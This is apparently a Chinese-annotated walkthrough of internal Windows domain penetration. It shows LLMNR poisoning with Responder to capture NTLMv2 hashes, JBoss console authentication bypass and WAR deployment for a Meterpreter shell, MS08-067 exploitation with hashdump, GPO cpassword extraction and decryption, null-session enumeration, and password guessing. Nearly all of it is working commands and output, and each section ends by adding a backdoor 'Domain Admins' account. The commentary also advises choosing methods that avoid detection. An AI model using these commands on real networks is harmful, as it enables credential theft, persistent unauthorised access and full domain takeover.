1.Netbios and LLMNR Name Poisoning


~/Responder# python Responder.py -i
NBT Name Service/LLMNR Answerer 1.0.Please send bugs/comments to: [email]lgaffie@trustwaveTo[/email] kill this script hit CRTL-C[+]
NBT-NS & LLMNR responder startedGlobal Parameters set:Challenge set is: 1122334455667788
WPAD Proxy Server is:OFF
HTTP Server is:ON
HTTPS Server is:ON
SMB Server is:ON
SMB LM support is set to:0
SQL Server is:ON
FTP Server is:ON
DNS Server is:ON
LDAP Server is:ON
FingerPrint Module is:OFF
LLMNR poisoned answer sent to this IP: The requested name was : wpad.LLMNR poisoned answer sent to this IP: The requested name was : wpad.LLMNR poisoned answer sent to this IP: The requested name was : 110.…snip…NBT-NS Answer sent to:
[+]SMB-NTLMv2 hash captured from :
Domain is : BEACONHILLSHIGHUser is : smccall
[+]SMB complete hash is : smccall::BEACONHILLSHIGH:1122334455667788:
reallylonghashShare requested: \\ECONOMY309\IPC$…snip...
LLMNR poisoned answer sent to this IP: The requested name was : wpad.
[+]SMB-NTLMv2 hash captured from :
User is : lmartin
[+]SMB complete hash is : lmartin:: BEACONHILLSHIGH:1122334455667788:
reallylonghashShare requested: \\ADVCHEM\311IPC$…snip…

这里的LM, NTLMv1, or NTLMv2哈希,能够用GPU或者彩虹表暴力破解.如果在responder会话过程中,抓到一个域管理员帐号,能够直接使用winexe运行cmd.exe命令

~/work/nmap# ~/SpiderLabs/winexe-PTH -U BEACONHILLSHIGH\\smccall%allison --uninstall --system // cmd.exe Microsoft Windows XP [Version 5.1.2600](C) Copyright 1985-2001 Microsoft Corp.C:\WINDOWS\system32>net user twadmin $piD3rsRul3! /add /domainnet user twadmin $piD3rsRul3! /add /domain
The request will be processed at a domain controller for domain beaconhillshigh.edu.
The command completed successfully.C:\WINDOWS\system32> net group "Domain Admins" twadmin /add /domainnet group "Domain Admins" twadmin /add /domain
The request will be processed at a domain controller for domain beaconhillshigh.edu.
The command completed successfully.



msfcli auxiliary/scanner/http/dir_scanner THREADS=25 RHOSTS=file:./8080 DICTIONARY=./http.scan.list RPORT=8080 E >> http.jboss.8080~/work/nmap# cat http.jboss.8080  <-- 这个是开25线程字典跑8080端口jboss后台的
[*] Initializing modules... 
THREADS => 25 
RHOSTS => file:./8080 
DICTIONARY => ./http.scan.list 
RPORT => 8080 
[*] Detecting error code 
[*] Detecting error code 
[*] Detecting error code 
[*] Detecting error code 
[*] Using code '404' as not found for 
[*] Using code '404' as not found for 
[*] Using code '404' as not found for 
[*] Found [url][/url] 401 ( 
[*] [url][/url] requires authentication: Basic realm="JBoss JMX Console" 
[*] Found [url][/url] 404 ( 
[*] Found [url][/url] 401 ( 
[*] [url][/url] requires authentication: Basic realm="JBoss JMX Console" 
[*] Found [url][/url] 404 ( 
[*] Scanned 4 of 4 hosts (100% complete) 
[*] Auxiliary module execution completedOutput from use auxiliary/scanner/http/jboss_vulnscan:
[*] /jmx-console/HtmlAdaptor requires authentication (401): Basic realm="JBoss JMX Console" 
[*] Check for verb tampering (HEAD) 
[+] Got authentication bypass via HTTP verb tampering 
[+] Authenticated using admin:admin 
[+] /status does not require authentication (200) [+] /web-console/ServerInfo.jsp does not require authentication (200)[+] /web-console/Invoker does not require authentication (200) [+] /invoker/JMXInvokerServlet does not require authentication (200)Output from 
use exploit/multi/http/jboss_maindeployer:          <--部署war包msf
exploit(jboss_maindeployer) > exploit
[*] Started reverse handler on
[*] Sorry, automatic target detection doesn't work with HEAD requests 
[*] Automatically selected target "Java Universal" 
[*] Starting up our web service on 
[url][/url] ... 
[*] Using URL: http:// 
[*] Asking the JBoss server to deploy (via MainDeployer) [url][/url] 
[*] Sending the WAR archive to the server... 
[*] Sending the WAR archive to the server... 
[*] Waiting for the server to request the WAR archive.... 
[*] Shutting down the web service... 
[*] Executing HlusdqEcokvXH... 
[+] Successfully triggered payload at '/HlusdqEcokvXH/ewNYTEdFnYdcaOl.jsp' 
[*] Undeploying HlusdqEcokvXH... 
[*] Sending stage (30355 bytes) to 
[*] Meterpreter session 1 opened ( -> at 2013-09-15 19:00:06 -0600
meterpreter > sysinfo Computer : BHHSMOFF011 OS : Windows 2003 5.2 (x86) Meterpreter : java/java
meterpreter > shell Process 1 created. Channel 1 created. 
Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp.
C:\DELLBAC\EJBContainer\bin>whoami whoami beaconhillshigh\backup_admin
C:\>net user twadmin $piD3rsRul3! /add /domain 
net user twadmin $piD3rsRul3! /add /domain 
The request will be processed at a domain controller for domain beaconhillshigh.edu.
The command completed successfully.
C:\>net group "Domain Admins" twadmin /add /domain
net group "Domain Admins" twadmin /add /domain 
The request will be processed at a domain controller for domain beaconhillshigh.edu.
The command completed successfully.


这个漏洞已经超过4年了,但是内网中还是有很多机器没有打补丁,影响的有(Windows Server 2000, Windows Server 2003, and Windows XP),不过说实话,我内网渗透的过程中很少用MS08-067,因为溢出不好,有可能造成DOS,被人发现了,就不好了,你懂得.

nmap --script=smb-check-vulns.nse -v -v -p 445,139 -iL smb -oA ms08 less ms08.
nmap <-- 使用NMAP的smb-check-vulns脚本识别下...snip...
Nmap scan report for shelob-squared ( 
Host is up (0.00042s latency). 
Scanned at 2013-09-16 21:52:32 CDT for 55s 
PORT STATE SERVICE 139/tcp open 
netbios-ssn 445/tcp open 
microsoft-ds MAC Address: 00:0C:29:E3:25:78 (VMware)
Host script results: | 
smb-check-vulns: | 
MS08-067: VULNERABLE      <--bingo..有漏洞| 
Conficker: Likely CLEAN | 
SMBv2 DoS (CVE-2009-3103): NOT VULNERABLE | 
MS06-025: NO SERVICE (the Ras RPC service is inactive) |_ 
MS07-029: NO SERVICE (the Dns Server RPC service is inactive)

nmap的NSE脚本是用LUA语言写的,把这些NSE都过一遍,对渗透很有帮助哦,尤其是在LINUX平台,win平台下除了有几种扫描方式利用不了,NSE脚本照样可以用,不过LINUX上默认安装的NMAP版本都比较低了,你不能直接放NSE到目录,注意看库之间的依赖关系,才能利用,上次看wooyun的drops,livers大牛回复我们组的Anthr@X牛的InsightScan.py,说用nse也实现了一个,我只想说,你能偷偷发我一份吗? 接下来,还是用metasploit溢出,不知道对中文系统效果怎么样,我没有试过 =.=

msf > use windows/smb/ms08_067_netapi 
msf exploit(ms08_067_netapi) > set RHOST 
msf exploit(ms08_067_netapi) > set TARGET 0 
TARGET => 0 
msf exploit(ms08_067_netapi) > set LHOST 
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp 
PAYLOAD => windows/meterpreter/bind_tcp 
msf exploit(ms08_067_netapi) > exploit
[*] Started bind handler 
[*] Automatically detecting the target... 
[*] Fingerprint: Windows XP - Service Pack 2 - lang:English 
[*] Selected Target: Windows XP SP2 English (AlwaysOn NX) 
[*] Attempting to trigger the vulnerability... 
[*] Sending stage (752128 bytes) to 
[*] Meterpreter session 1 opened ( -> at 2013-09-16 21:54:15 -0500
meterpreter > getsystem 
...got system (via technique 1). 
meterpreter > sysinfo 
Computer : SHELOB-SQUARED OS : Windows XP (Build 2600, Service Pack 2). 
Architecture : x86 System Language : en_US 
Meterpreter : x86/win32meterpreter > run hashdump 
[*] Obtaining the boot key... 
[*] Calculating the hboot key using SYSKEY 48c76bfa334c4c21edd1154db541c2c2... 
[*] Obtaining the user list and keys... 
[*] Decrypting user keys... 
[*] Dumping password hints...
Frodo:"what do i have" Samwise:"Frodo" Stryder:"love" Legolas:"favorite saying" Gimli:"what am i" Boromir:"what I am" Gandalf:"moria"
[*] Dumping password hashes... Administrator:500:f75d090d8564fd334a3b108f3fa6cb6d:3019d5d61cdf713c7b677efefc22f0e5::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: HelpAssistant:1000:7e8a50750d9a1a30d3d4a83f88ea86ab:6fba9c0f469be01bab209ee2785a818d::: SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:861165412001ece0a5e73ab8863129d8::: Frodo:1003:74052b0fb3d802a3be4db4ed34a95891:a7cee25799f518f9bd886683a13ed6d0::: Samwise:1004:aad3b435b51404eeaad3b435b51404ee:7dff81410af5e2d0c2b6e54a98a8f622::: Stryder:1005:825f8bc99c2a5013e72c57ef50f76a05:1047f0b952cfbffbdd6c34ef6bd610e5::: Legolas:1006:625d787db20f1dd8aad3b435b51404ee:cc5b9f225e569fa3a2534be394df531a::: Gimli:1007:aad3b435b51404eeaad3b435b51404ee:e4d2534368ff0f1cbe2a42c5d79b9818::: Boromir:1008:e3bee25ac9de68cec2cc282901fd62d9:4231db4c15025d1951f3c0d39d8656a2::: Gandalf:1009:20ef2c7725e35c1dbd7cfc62789a58c8:02d0a4d2b6c7d485a935778eb90e0446:::
meterpreter > shell 
Process 2708 created. 
Channel 1 created. 
Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. 
C:\ WINDOWS\system32>whoami whoami MIRKWOOD\Gandalf
C:\WINDOWS\system32>net user twadmin $piD3rsRul3! /add /domain 
The request will be processed at a domain controller for domain MIRKWOOD.
The command completed successfully.
C:\WINDOWS\system32>net group "Domain Admins" twadmin /add /domain 
net group "Domain Admins" twadmin /add /domain 
The request will be processed at a domain controller for domain MIRKWOOD.
The command completed successfully.

4. GPO cpassword


smbclient -W MIRKWOOD -U ‘Legolas%orcs’ \\\\\\SYSVOL    <--使用smbclient连接, 支持上传下载
Domain=[ MIRKWOOD] 
OS=[Windows Server 2008 R2 Standard 7600] 
Server=[Windows Server 2008 R2 Standard 6.1] 
smb: \> dir . 
D 0 Wed Sep 15 15:08:37 
2012.. D 0 Wed Sep 15 15:08:37 2012 
mirkwood.local D 0 Wed Sep 15 15:08:37 
201248457 blocks of size 4194304. 
44175 blocks available
smb: \> cd mirkwood.local\ 
smb: \smirkwood.local\> dir . D 0 Wed Sep 15 15:13:05 
2012 .. D 0 Wed Sep 15 15:13:05 2012 
Policies D 0 Tue Oct 30 10:29:31 
2012 scripts D 0 Thu Nov 8 12:50:21 2012
smb:\> recursesmb:\> prompt off 
smb:\> mget Policies 
…snip…getting file \mirkwood\Policies\PolicyDefinitions\access32.admx of size 98874 as access32.admx (3657.0 KiloBytes/sec) (average 3657.0 KiloBytes/sec) 
getting file \ mirkwood \Policies\PolicyDefinitions\access34.admx of size 131924 as access34.admx (27324.5 KiloBytes/sec) (average 7038.2 KiloBytes/sec) 
getting file \ mirkwood \Policies\PolicyDefinitions\ActiveXInstallService.admx of size 7217 as ActiveXInstallService.admx (2303.1 KiloBytes/sec) (average 6722.5 KiloBytes/sec) 
getting file \ mirkwood \Policies\PolicyDefinitions\AddRmvPrograms.admx of size 7214 as AddRmvPrograms.admx (2301.6 KiloBytes/sec) (average 6446.2 KiloBytes/sec) getting file \ mirkwood \Policies\PolicyDefinitions\asdf.admx of size 4249 as asdf.admx (122.0 KiloBytes/sec) (average 4940.4 KiloBytes/sec) 
getting file \ mirkwood \Policies\PolicyDefinitions\AppCompat.admx of size 4893 as AppCompat.admx (2633.2 KiloBytes/sec) (average 4835.6 KiloBytes/sec) 
getting file \ mirkwood \Policies\PolicyDefinitions\AttachmtMgr.admx of size 3865 as AttachmtMgr.admx (2912.5 KiloBytes/sec) (average 4752.0 KiloBytes/sec) 
getting file \ mirkwood \Policies\PolicyDefinitions\AutoPlay.admx of size 5591 as AutoPlay.admx …snip…
smb:\> recurse smb:\> prompt off 
smb:\> mget scripts …snip…
smb: \avi\> mget scripts Get directory scripts? y 
Get directory bin? y 
Get file #INCLUDE.BAT? y 
getting file \ mirkwood \scripts\bin\#INCLUDE.BAT of size 2839 as #INCLUDE.BAT (409.6 KiloBytes/sec) (average 409.7 KiloBytes/sec) 
getting file \ mirkwood \scripts\bin\NETLOGON.BAT of size 1438 as NETLOGON.BAT (28.9 KiloBytes/sec) (average 137.7 KiloBytes/sec) 
getting file \ mirkwood \scripts\bin\NETLOGON2.BAT of size 16781 as NETLOGON2.BAT (691.0 KiloBytes/sec) (average 566.0 KiloBytes/sec) 
getting file \ mirkwood \scripts\bin\NETLOGON3.BAT of size 16486 as NETLOGON3.BAT (1268.5 KiloBytes/sec) (average 773.6 KiloBytes/sec) 
getting file \ mirkwood \scripts\bin\NETLOGON4.BAT of size 17429 as NETLOGON4.BAT (1108.7 KiloBytes/sec) (average 858.8 KiloBytes/sec) …snip…

Once the files are downloaded, grep through both policies and scripts for Administrator or cpassword (either would work in this instance):

grep -ri administrator .grep -ri cpassword .~/work/nmap/
#grep -ri administrator . ./{FC71D7SS-51E2-4B9D-B261-GB8C9733D433}/Machine/Preferences/Groups/Groups.xml: :<Groups clsid="{3125E277-EB16-4b4c-6534-544FC6D24D26}">
<User clsid="{HH5F1654-51E6-4d24-9B1A-D9BFN34BA1D1}" name="Administrator (built-in)" image="2" changed="2012-12-30 12:47:25" uid="{8E2D5E22-E914-438F-SS5D-FDDA92925BB7}" userContext="0" removePolicy="0"><Properties action="U" newName="" fullName="" description="" cpassword="j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw" changeLogon="0" noChange="0" neverExpires="0" acctDisabled="0" subAuthority="RID_ADMIN" userName="Administrator (built-in)"/>

The cpassword is taken and run through the decryption script from  ... s-and-getting.html.

~/work# ruby decrypt.rb    <--解密Local*P4ssword!
~/work/nmap# ~/SpiderLabs/winexe-PTH -U MIRKWOOD\\’Administrator%Local*P4ssword!’ --uninstall --system // cmd.exe      <-- winexe和win下经典工具psexec效果一样一样的Microsoft Windows [Version 5.2.3790] (C) Copyright 1985-2003 Microsoft Corp.C:\WINDOWS\system32> net user twadmin $piD3rsRul3! /add /domain The request will be processed at a domain controller for domain MIRKWOOD.
The command completed successfully.C:\WINDOWS\system32>net group "Domain Admins" twadmin /add /domain net group "Domain Admins" twadmin /add /domain 
The request will be processed at a domain controller for domain MIRKWOOD.
The command completed successfully.

5.NetBIOS Null Enumeration Allowed on Server


~/enum4linux.pl -u Legolas -p orcs -w MIRKWOOD -a 
>> enum-
# cat enum- Starting enum4linux v0.8.7 ( [url]/[/url] ) on Tue Sep 10 10:15:14 2013
| Target Information | 
Target ........... 
RID Range ........ 500-550,1000-1050 
Username ......... '' 
Password ......... '' 
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
| Enumerating Workgroup/Domain on | =================================================== 
[+] Got domain/workgroup name: MIRKWOOD
| Nbtstat Information for |
Looking up status of MODOR <00> - M Workstation Service MIRKWOOD 
<00> - M Domain/Workgroup Name MIRKWOOD <1c> - M Domain Controllers MORDOR 
<20> - M File Server Service
MAC Address = B5-AD-2F-37-2G-4F
| Session Check on | 
[+] Server allows sessions using username '', password '' 
| Users on | 
index: 0x2b76 RID: 0xd08 acb: 0x00000610 
Account: Administrator 
Name: Administrator Desc: (null) index: 0x1822 RID: 0xb0a acb: 0x00000414 
Account: Frodo Name: Frodo Baggins Desc: (null) index: 0x1bga RID: 0xc0a acb: 0x00080210 
Account: Samwise Name: Samwise Gamgee User Desc: (null) index: 0x1dc4 RID: 0xc7a acb: 0x00050210 
Account: Stryder Name: Aragorn User Desc: (null) index: 0x1823 RID: 0xb0b acb: 0x00007014 Account: Legolas Name: Legolas Greenleaf Desc: (null) index: 0x1824 RID: 0xb0c acb: 0x00010014 
Account: Gimli Name: Gimli son of Glóin Desc: (null) index: 0x1825 RID: 0xb0d acb: 0x00300014 
Account: Boromir Name: Boromir son of Denethor II Desc: (null) index: 0x126f RID: 0x9eb acb: 0x00004014 
Account: Gandalf Name: Gandalf the Gray Desc: (null) index: 0x1826 RID: 0xb0e acb: 0x00020015 
Account: gollum Name: gollum Desc: (null) 
# cat enum- .txt | grep "Domain Admins" 
Group 'Administrators' (RID: 544) has member: MIRKWOOD\Domain Admins 
Group:[Domain Admins] rid:[0x200] 
Group 'Domain Admins' (RID: 512) has member: MIRKWOOD \Gandalf 
Group 'Domain Admins' (RID: 512) has member: MIRKWOOD \Stryder 
Group 'Domain Admins' (RID: 512) has member: MIRKWOOD \Administrator 
Group 'Domain Admins' (RID: 512) has member: MIRKWOOD \gollum 
Group 'Domain Admins' (RID: 512) has member: MIRKWOOD \Saruman 
S-1-5-21-8675309254-522963170-1866889882-512 MIRKWOOD \Domain Admins (Domain Group) 
S-1-5-21-1897573695-8675309227-1212564242-512 MORDOR\Domain Admins (Domain Group)
~/work/nmap/# medusa -M smbnt -H smb -u gollum -p gollum -m GROUP:DOMAIN | tee smb-gollum.medusa
ACCOUNT CHECK: [smbnt] Host: (1 of 62, 0 complete) User: gollum (1 of 1, 0 complete) Password: gollum (1 of 1 complete) 
ACCOUNT FOUND: [smbnt] Host: User: gollum Password: gollum [SUCCESS (0x000072:STATUS_ACCOUNT_DISABLED)] 
ACCOUNT CHECK: [smbnt] Host: (2 of 62, 1 complete) User: gollum (1 of 1, 0 complete) Password: gollum (1 of 1 complete) 
ACCOUNT FOUND: [smbnt] Host: User: gollum Password: gollum [SUCCESS (0x000072:STATUS_ACCOUNT_DISABLED)] 
ACCOUNT CHECK: [smbnt] Host: (3 of 62, 2 complete) User: gollum (1 of 1, 0 complete) Password: gollum (1 of 1 complete) 
ACCOUNT FOUND: [smbnt] Host: User: gollum Password: gollum [SUCCESS] ACCOUNT CHECK: [smbnt] Host: (4 of 62, 3 complete) User: gollum (1 of 1, 0 complete) Password: gollum (1 of 1 complete) 
ACCOUNT FOUND: [smbnt] Host: User: gollum Password: gollum [SUCCESS (0x000072:STATUS_ACCOUNT_DISABLED)] 
ACCOUNT CHECK: [smbnt] Host: (5 of 62, 4 complete) User: ssadmin (1 of 1, 0 complete) Password: gollum (1 of 1 complete) 
ACCOUNT FOUND: [smbnt] Host: User: gollum Password: gollum [SUCCESS] ACCOUNT CHECK: [smbnt] Host: (7 of 62, 6 complete) User: gollum (1 of 1, 0 complete) Password: gollum (1 of 1 complete) 
User: gollum 
Password: gollum [SUCCESS] 
…snip…~/work/nmap# ~/SpiderLabs/winexe-PTH -U MIRKWOOD\\gollum%gollum --uninstall --system // cmd.exeMicrosoft Windows [Version 5.2.3790] (C) Copyright 1985-2003 Microsoft Corp. C:\ WINDOWS\system32>whoami whoami MIRKWOOD\gollumC:\WINDOWS\system32>> net user twadmin $piD3rsRul3! /add /domain The request will be processed at a domain controller for domain MIRKWOOD.The command completed successfully.C:\WINDOWS\system32>net group "Domain Admins" twadmin /add /domain net group "Domain Admins" twadmin /add /domain The request will be processed at a domain controller for domain MIRKWOOD.
The command completed successfully.




